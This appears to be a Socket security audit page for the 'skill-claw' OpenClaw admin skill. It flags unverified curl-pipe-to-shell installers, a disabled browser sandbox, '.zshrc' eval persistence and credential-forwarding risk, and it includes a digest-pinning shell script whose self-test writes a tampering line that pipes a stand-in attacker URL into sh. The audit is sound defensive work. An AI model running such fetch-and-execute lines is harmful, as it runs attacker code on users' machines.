skill-claw

Warn

Audited by Socket on Apr 10, 2026

4 alerts found:

Anomaly ×2, Security ×2

Anomaly, severity LOW
docs/proxmox.md

No clear evidence of intentional malware, backdoors or exfiltration is present in the provided fragment itself; it is primarily operational documentation. However, it repeatedly executes remote scripts directly via `curl | bash/sh` without any integrity verification, which is a significant supply-chain execution risk at provisioning time if an upstream endpoint or the transport is compromised. It also disables the browser sandbox (`noSandbox: true`), which raises the impact of any renderer exploit if the browser automation processes malicious content. Publishing the service through Tailscale exposes the listener behind localhost:18789 beyond the host, to other nodes on the tailnet. Strongly recommended mitigations: pin and verify installer artifacts (checksums or signatures) and run them from a downloaded file rather than piping `curl` into a shell, validate and limit permissions on the persistence mount, and reconsider disabling the browser sandbox or compensate with additional isolation controls.

Confidence: 62%, Severity: 62%

Anomaly, severity LOW
docs/macos.md

No direct malicious behavior (exfiltration, keylogging, cryptomining, or backdoor logic) is evidenced in the provided snippet because it is installation/admin documentation rather than Gateway source code. However, the fragment presents a significant supply-chain risk pattern: executing an unaudited remote installer via `curl ... | bash`, combined with optional persistence through a launchd LaunchAgent. Actual malware likelihood cannot be confirmed without reviewing the fetched installer script and the installed Gateway/runtime implementation.

Confidence: 62%, Severity: 63%

Security, severity MEDIUM
scripts/setup-zsh.sh

No explicit malicious payload (e.g., credential theft, data exfiltration, or persistence beyond normal shell configuration) is present in the shown code. However, the script carries significant supply-chain risk: it performs direct remote code execution via `curl ... | sh` / `curl ... | bash` for zoxide and atuin, installs and runs third-party code via `git clone` and the fzf installer, and persists future execution by injecting `.zshrc` content that runs `eval` on the dynamic initialization output of those tools. If any upstream repository or download endpoint is compromised, this module enables arbitrary code execution on the user's machine both at install time and, through the `eval` lines, on every new zsh session.
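The two recurring findings on this page (unverified `curl | sh` installs in docs/proxmox.md, docs/macos.md and scripts/setup-zsh.sh, and `.zshrc` lines that `eval` whatever a tool's `init` command prints) share one fix: pin a digest and check it before anything runs. The script below is an added example written for this audit page; it is not code from skill-claw, OpenClaw, zoxide, atuin or fzf. It assumes `sha256sum` (Linux) or `shasum` (macOS) is on the PATH, that the caller supplies the installer URL and the pinned SHA-256 (both hypothetical here), and uses a `printf` command as a stand-in for `zoxide init zsh` / `atuin init zsh` so the self-test runs offline on constructed data.

```shell
#!/bin/sh
# Added example for the skill-claw audit, not part of the audited skill.
# (1) fetch_verify_run: replace `curl -fsSL URL | sh` with download, digest check, then run.
# (2) snapshot_init / pinned_ok: replace `eval "$(tool init zsh)"` with a reviewed,
#     digest-pinned snapshot file that is only sourced while it is unchanged.
set -eu

sha256_of() {
  # Hex SHA-256 of a file; portable across coreutils (sha256sum) and macOS (shasum).
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | cut -d' ' -f1
  else
    shasum -a 256 "$1" | cut -d' ' -f1
  fi
}

# verify_file FILE EXPECTED_HEX_SHA256 -> status 0 on match, 1 otherwise.
verify_file() {
  [ "$(sha256_of "$1")" = "$2" ]
}

# fetch_verify_run URL EXPECTED_HEX_SHA256 [INTERPRETER]
# The URL and digest are assumptions supplied by the caller (e.g. pinned in your own
# repo next to the docs). Nothing executes until the digest matches. Needs network,
# so it is not exercised by the offline self-test below.
fetch_verify_run() {
  url=$1; expected=$2; interp=${3:-sh}
  tmp=$(mktemp)
  trap 'rm -f "$tmp"' EXIT
  curl -fsSL --proto '=https' --tlsv1.2 -o "$tmp" "$url"
  if ! verify_file "$tmp" "$expected"; then
    echo "refusing to run $url: SHA-256 does not match the pinned value" >&2
    return 1
  fi
  "$interp" "$tmp"
}

# snapshot_init SNAPSHOT_FILE COMMAND...  (e.g. snapshot_init ~/.zsh/zoxide.zsh zoxide init zsh)
# Runs the init generator once, at install time, and stores its output plus a digest
# so the text can be read and diffed instead of being eval'd blind on every login.
snapshot_init() {
  out=$1; shift
  "$@" > "$out"
  sha256_of "$out" > "$out.sha256"
}

# pinned_ok SNAPSHOT_FILE -> status 0 only if the snapshot still matches its digest.
# In .zshrc:  pinned_ok ~/.zsh/zoxide.zsh && . ~/.zsh/zoxide.zsh
pinned_ok() {
  [ -f "$1" ] && [ -f "$1.sha256" ] && verify_file "$1" "$(cat "$1.sha256")"
}

# Offline self-test on constructed data: a fake installer and a fake init generator.
# Prints "ok" when both the tampered download and the tampered snapshot are rejected.
self_check() {
  d=$(mktemp -d)
  # 1. installer pinning: the pristine file verifies, the tampered one must not
  printf '#!/bin/sh\necho installed\n' > "$d/install.sh"
  pinned=$(sha256_of "$d/install.sh")
  verify_file "$d/install.sh" "$pinned" || { echo "fail:verify"; return 1; }
  printf 'curl -s https://attacker.invalid/x | sh\n' >> "$d/install.sh"  # simulated tampering
  if verify_file "$d/install.sh" "$pinned"; then echo "fail:tamper"; return 1; fi
  # 2. init snapshot: sourcing stays allowed only while the snapshot is unchanged
  snapshot_init "$d/tool.zsh" printf 'alias z="cd"\n'
  pinned_ok "$d/tool.zsh" || { echo "fail:snapshot"; return 1; }
  printf 'alias z="curl -s https://attacker.invalid/x | sh"\n' >> "$d/tool.zsh"
  if pinned_ok "$d/tool.zsh"; then echo "fail:snapshot-tamper"; return 1; fi
  rm -rf "$d"
  echo ok
}
```

The digest pinned for `fetch_verify_run` must come from somewhere other than the server that serves the script (your own repo, a release page you checked out of band, or a signature you verified), otherwise an attacker who controls the endpoint controls both. The snapshot approach trades automatic pickup of new init code for a review step: after a tool upgrade, rerun `snapshot_init`, diff the snapshot, and only then let `pinned_ok` pass again.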

Confidence: 78%, Severity: 70%

Security, severity MEDIUM
SKILL.md

Suspicious. The skill's admin capabilities mostly match its stated purpose, but it combines broad host-control instructions with automatic activation and download-and-execute install paths that are never verified. Because the unverifiable OpenClaw installer/CLI is expected to handle stored credentials and bot tokens, the supply-chain and credential-forwarding risk is high even without direct evidence of malicious exfiltration.

Confidence: 84%, Severity: 83%

Audit Metadata

Analyzed At: Apr 10, 2026, 03:51 AM
Package URL: pkg:socket/skills-sh/nyldn%2Fopenclaw-admin%2Fskill-claw%2F@aa9a329c7233d059578f10a7c6b4e897c787116b
Security Audit — socket — skill-claw